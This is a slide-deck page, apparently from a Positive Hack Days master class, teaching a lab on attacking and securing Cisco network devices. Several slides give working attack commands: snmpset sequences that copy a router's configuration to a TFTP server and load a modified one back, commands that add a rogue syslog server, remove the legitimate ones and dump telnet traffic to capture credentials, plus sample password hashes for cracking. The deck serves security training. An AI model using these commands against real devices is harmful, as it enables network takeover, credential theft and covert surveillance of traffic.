Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраструктуры
Download as PPT, PDF0 likes1,259 views
Мастер-класс посвящен анализу защищенности сетевой инфраструктуры, включая сканирование, использование стандартных паролей для snmp, управление через telnet и ssh, а также регистрацию событий и использование VPN. Документ содержит подробные практические задания, направленные на изучение уязвимостей и методов защиты сетевых устройств. Основной вывод подчеркивает необходимость комплексной защиты сетевых устройств и постоянного контроля их безопасности.
![Спасибо за внимание! [email_address]](https://image.slidesharecdn.com/random-110620030032-phpapp01/85/Positive-Hack-Days-30-320.jpg)
Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраструктуры
- 1. Мастер-класс по теме «Анализ защищенности сетевой инфраструктуры» Павлов Сергей Positive Technologies
- 2. Введение в тему безопасности сетевой инфраструктуры
- 3. План лабораторной работы Сканирование Стандартные пароли SNMP Учетные записи управления через Telnet и SSH Стандартные значения сетевых устройств Регистрация событий. VPN Резюме
- 4. Часть 1. Сканирование Сканирование - всегда первый шаг, используемый злоумышленниками для получения списка доступных сервисов Полученная информация может быть использована для: Попытки подбора учетных записей и паролей Определений версий сервисов
- 5. Практическое занятие (1) Загрузить виртуальную машину Просканировать определенный порт сетевого устройства с помощью ПО nmap.
- 6. Часть 2 : Стандартные пароли SNMP
- 7. SNMPv1/2 Права в SNMP Read-only - Режим используется только для мониторинга устройства без прав на управление . Read-write - мониторинг и управление устройством . Пример подбора строк подключения для SNMP с помощью утилиты SNSCAN от McAfee :
- 8. Копирование файла конфигурации через SNMP TFTP- сервер snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address < адрес TFTP- сервера>. snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1 / //Возврат модифицированного файла конфигурации ( starup-config) // обратно на устройство snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address < адрес TFTP- сервера>. snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-config snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1 // Перезагрузка устройства для применения изменений
- 9. Практическое занятие ( 2 ) Включить TFTP- сервер Подобрать пароль на SNMP Скопировать файл конфигурации на TFTP- сервер
- 10. Часть 3. Учетные записи управления через Telnet и SSH
- 11. Типы привилегий Стандартные привилегии На устройстве предоставляются ограниченные привилегии (уровень 1) на выполнение ограниченного набора команд. Повышенные привилегии Для повышения привилегий на Cisco требуется знать пароль « enable » (уровень 15)
- 12. Типы паролей пользователей Без шифрования username cisco password 0 cisco Слабое шифрование username admin password 7 104F0D140C1953 Существует множество утилит для восстановления. Например: Cain&Abel . Время восстановления: доли секунд. Хеширование пароля enable secret 5 $1$1lSz$k.iGUgWvgxm27iJ/vaBfK0 Пароль восстанавливает только методом перебора. Для восстановления можно использовать ПО: Cain&Abel , PasswordPro, John the Ripper и т.п. Время восстановления: не предсказуемо.
- 13. Практическое занятие (3) Восстановить пароль пользователя “admin” Восстановить пароль enable
- 14. Часть 4. Стандартные значения сетевых устройств.
- 15. Примеры Зачастую на сетевых устройствах присутствуют стандартные значения, т.е. мы их не видим в конфигурации, а они есть ;) При включении aaa new-model, применяются значения: aaa authentication login default local – для vty aaa authentication login default none – для con HTTP сервер не зависит от службы “aaa” и по умолчанию используется пароль “enable”
- 16. Практическое занятие (4) Набрать при входе на устройство через telnet вместо учетной записи “admin” “AdMIn” Зайти через HTTP на устройство , используя только пароль enable . Завести нового пользователя через веб-интерфейс Проверить, что новый пользователь может зайти через telnet
- 17. Часть 5. Регистрация событий. ДОБРО или ЗЛО?
- 18. Регистрация событий помогает: Искать неисправности в сети Обнаруживать попытки НСД Контролировать изменения конфигураций, устройств НО ! Регистрация событий может играть и негативную роль: При добавлении нового сервера регистрации в конфигурацию, злоумышленник получает те же данные, что и администратор сети Служба регистрации позволяет перехватить учетные записи и пароли пользователей в проходящем через устройство трафике Функции регистрации событий
- 19. Добавление нового сервера регистрации событий Добавление нового сервера MC#conf t MC(config)#logging 192.168.123.4 Удаление остальных…. Чтобы не мешали работать ;) MC#conf t MC(config)#no logging 1.2.3.4
- 20. Перехватить трафик нельзя?! А если очень хочется? … То можно MC#conf t MC(config)#logging trap 7 MC(config)#access-list 122 permit tcp any any eq telnet MC(config)#end MC#debug ip packet 122 detail dump Получение новых событий конечно интересно, но ведь интересен и трафик, «проходящий» через устройство, особенно который не шифруется. Для этого можно воспользоваться не декларированными возможностями Cisco IOS.
- 21. Практическое занятие (5) Включить сервер регистрации Добавить новый сервер регистрации событий на сетевом устройстве Регистрация трафика службы Telnet
- 22. Часть 6 . VPN
- 23. Зачем нужен VPN ? Без VPN доступ из общей сети возможен только к пограничным устройствам Через VPN возможен доступ к службам, которые обычно «зарезают» провайдеры. Например: 445 /tcp. Сетевые устройства не поддерживают все популярные сервисы. Например: с сетевого устройства нельзя запустить RDP- сессию.
- 24. Типы VPN GRE — протокол туннелирования сетевых пакетов без шифрования. Основное назначение — инкапсуляция пакетов сетевого уровня в IP пакеты . L2TP - туннельный протокол, не обеспечивает шифрование и конфиденциальность. Опирается на инкапсулируемый протокол для обеспечения конфиденциальности. PPTP - туннельный протокол типа точка-точка. Создает с сервером туннель для обмена данными. IPSEC - позволяет осуществлять подтверждение подлинности и/или шифрование IP-пакетов.
- 25. Пример настройки PPTP aaa new-model aaa authentication ppp default local vpdn enable ! vpdn-group 1 ! Default PPTP VPDN group accept-dialin protocol pptp virtual-template 1 local name tunnel ! interface Virtual-Template1 ip unnumbered FastEthernet0/1 ip mroute-cache peer default ip address pool default ppp encrypt mppe auto ppp authentication ms-chap ! ip local pool default 1.1.1.10 1.1.1.100
- 26. Практическое занятие (6) Настроить PPTP, подключиться к устройству Проверить доступность узла 1.1.1. 1
- 28. Резюме Нельзя оставлять без внимания сетевые устройства. Поскольку при их «захвате» злоумышленник может манипулировать всей сетью Компании Использовать при настройки сетевых устройств « best practice » по безопасности Защита сетевых устройств должна быть комплексной Постоянно контролировать защищенность сети
- 29. Дополнительные материалы и ссылки Сканирование SNMPv1/2 SNSCAN Hydra Копирование конфигурации через SNMP Настройка PPTP Дистрибутив BackTrack
- 30. Спасибо за внимание! [email_address]